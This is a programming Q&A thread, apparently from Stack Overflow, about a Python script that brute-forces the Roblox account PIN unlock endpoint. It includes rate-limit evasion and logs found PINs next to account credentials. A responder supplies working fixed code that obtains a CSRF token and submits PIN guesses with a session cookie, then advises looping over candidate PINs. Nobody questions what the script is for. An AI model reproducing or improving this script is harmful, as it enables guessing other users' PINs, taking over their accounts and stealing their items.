Roblox API Link no longer works
I have no clue why it used to work weeks ago and now it doesn't. If anyone knows if they have like moved to another api link or whatever please kindly let me know:
https://auth.roblox.com/v1/account/pin/unlock
Ran a program using it and worked perfectly fine until those days where it gives me this error:

[ERROR] ChunkedEncodingError: ("Connection broken:
InvalidChunkLength(got length b'', 0 bytes read)",
InvalidChunkLength(got length b'', 0 bytes read)). Retrying in 1
seconds.

(the script is written to give me that error at the very end of here:)
def try_pin(pin, retries=3):
    global tried
    retry_count = 0
    backoff = 1
    while retry_count < retries:
        try:
            r = req.post('https://auth.roblox.com/v1/account/pin/unlock', json={'pin': pin})
            if 'X-CSRF-TOKEN' in r.headers:
                req.headers['X-CSRF-TOKEN'] = r.headers['X-CSRF-TOKEN']
                return 'retry'
            elif 'errors' in r.json():
                code = r.json()['errors'][0]['code']
                if code == 0 and r.json()['errors'][0]['message'] == 'Authorization has been denied for this request.':
                    print(f'[FAILURE] Authorization denied. Waiting for 2 minutes before retrying.')
                    time.sleep(60 * 2)
                    return 'retry'
                elif code == 1:
                    print(f'[SUCCESS] NO PIN')
                    with open('pins.txt', 'a') as f:
                        f.write(f'NO PIN:{credentials}\n')
                    return 'break'
                elif code == 3 or '"message":"TooManyRequests"' in r.text:
                    print(f'[RATE LIMITED] Waiting for 2 minutes before retrying.')
                    time.sleep(60 * 2)
                    return 'retry'
                elif code == 4:
                    tried += 1
                    save_tried_pin(pin, tried_pins_file, tried_pins)
                    return 'break'
            elif 'unlockedUntil' in r.json():
                print(f'[SUCCESS] {pin}')
                with open('validpin.txt', 'a') as f:
                    f.write(f'{pin}\n')
                with open('pins.txt', 'a') as f:
                    f.write(f'{pin}:{credentials}\n')
                save_tried_pin(pin, tried_pins_file, tried_pins)
                return 'break'
            else:
                print(f'[ERROR] {r.text}')
                return 'error'
        except requests.exceptions.ChunkedEncodingError as e:
            print(f'[ERROR] ChunkedEncodingError: {e}. Retrying in {backoff} seconds.')
            retry_count += 1
            time.sleep(backoff)
            backoff *= 2  # Exponential backoff
        except requests.exceptions.RequestException as e:
            print(f'[ERROR] RequestException: {e}')
            return 'error'
    return 'error'


Please edit your post and clarify your question. It's not clear what you're actual question is. You've told us there is an error. OK. So, what's your question?  Also, what have you found in your research of that error? What have you found when you debug your code that leads you to believe the issue is with the API url?

sorry im new to this and i dont know much but it most likely is due to api since when u enter the page it says "{"errors":[{"code":0,"message":"Unable to authenticate request."}]}" so i believe that api is saying that you can no longer use it or something. also the script detects that you're being logged onto an username so theres no errors anywhere but in that part. not to mention this is like the last lines of the script itself

and how it used to work perfectly fine weeks ago and out of nowhere it no longer works.

Comments can get deleted. Please [edit] your post, but give [ask] a read before you do so.

I made my own code. It will work for your purposes.
You didn't include a roblox cookie, so roblox won't know which account your're trying to login to.
Secondly, you didn't include an x-csrf-token.
from urllib.request import Request, urlopen
import urllib.error

import requests

cookie = "_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_no cookie for you"

def try_pin(pin):
    global cookie
    url = "https://auth.roblox.com/v2/logout"
    httprequest = Request(url, headers={"Cookie":".ROBLOSECURITY="+cookie}, method="POST")

    try:
        with urlopen(httprequest) as response:
            #This actually isn't used so this isn't necessary.
            csrf = response.info()["x-csrf-token"]
    except urllib.error.HTTPError as e:
        print(e.read().decode())
        csrf = e.info()["x-csrf-token"]


    return (requests.post("https://auth.roblox.com/v1/account/pin/unlock", headers = {"Cookie":".ROBLOSECURITY="+cookie, "x-csrf-token":csrf}, data={"pin":pin}).text)

This should work. Also may I recommend you to read the api docs? All of the roblox docs are in the form 'randomapi.roblox.com/docs', which in this case, is this and remember to look at the v1 docs.

I was wondering on how can I apply this to the full script as what I have sent isn't the full script but a part of it.

@sfc15 can you elaborate on what you are trying to achieve? You should be able to modify my code to have the same effect as your original one.

i just put the cookie of the account on your script and what it does is get automatically closed. doesnt try any pins or whatever. the script purpose is to try different pins until you've found the correct one.

@sfc15 If it gets automatically closed, which I presume to mean that it didn't return anything, maybe make sure your cookie is correct? It starts with the warning and ends with a bunch of capital letters, so maybe you included some extra redundant bits? This script you can probably just put into a new function with like a for pin in pins: try_pin(pin) or something like that. Also you might get rate-limited.
